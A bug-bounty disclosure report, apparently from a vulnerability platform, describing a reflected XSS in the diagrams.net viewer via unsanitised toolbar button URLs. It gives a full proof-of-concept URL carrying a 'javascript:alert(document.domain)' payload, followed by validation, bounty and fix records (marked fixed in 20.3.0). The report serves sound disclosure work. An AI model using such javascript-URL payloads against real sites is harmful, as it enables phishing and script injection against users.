XSS at https://viewer.diagrams.net/ in jgraph/drawio

Valid

Reported on

Sep 5th 2022


Description

The application uses a parameter to specify a url on the refresh and the back button, assigning it to location.href without sanitizing

Proof of Concept

Go to:

https://viewer.diagrams.net/index.html?tags=%7B%7D&highlight=0000ff&&layers=1&nav=1&toolbar=1&toolbar-config=%7B%22backBtn%22:%7B%22url%22:%22javascript:alert(document.domain)%22%7D,%22refreshBtn%22:%7B%22url%22:%22javascript:alert(document.domain)%22%7D%7D&title=xss.drawio#RdZNdb9sgFIZ%2FjaXtopUDTdZdxkmbatI2TVnVa2qoTQscD%2BPa6a%2FfIYA%2F1lWyZHjOy%2FnikNGdHg6WNfV34EJlJOdDRvcZIasrQjL%2F5fwUCF1HUFnJo2gCR%2FkmIswj7SQX7ULoAJSTzRKWYIwo3YIxa6Ffyp5ALaM2rBLvwLFk6j19kNzVgV6TLxO%2FE7KqU%2BTV5muwaJbEsZK2Zhz6GaI3Gd1ZABdWetgJ5ZuX%2BhLO3X5gHROzwrj%2FHLhvhf35%2BOx7QnLFHvFezqKMbBTqiycw3tK6Uyx186eDZLhozxexRcE6b%2FAyi8mOq8r%2Ff4vBJWcYNfgLppCakuYlxHxmr6wtrWzQuF1sfLr%2BW%2BcMW27dJw5lp7GiSw6aSfM5uEpFr39ct923fP9r%2F3ab3w2H432nL1ZjM8cmTVUR59OkRe20b8AKl62z8CJ2oMAiMWCEr1oq9Q9iSlYGtyWmI5AXr5igxNHYRoOWnPswRV9LJ44NK33MHh8CMgud4cLnnY8d8Q7E8OH9zQs5CNDC2RNK4gFK4yDFl0Q2cd9Pc5lQPRvJdIzFl1CNnqdhwUXsXdrOxiehaVTP8tmDpzd%2FAQ%3D%3D

Click on the refresh or the back icon on toolbar

Impact

XSS, phishing

We are processing your report and will contact the jgraph/drawio team within 24 hours. 3 months ago
David Benson validated this vulnerability 3 months ago
Joao Vitor Maia has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
David Benson marked this as fixed in 20.3.0 with commit b5dfeb 3 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
EditorUi.js#L2555 has been validated
EditorUi.js#L2819 has been validated
to join this conversation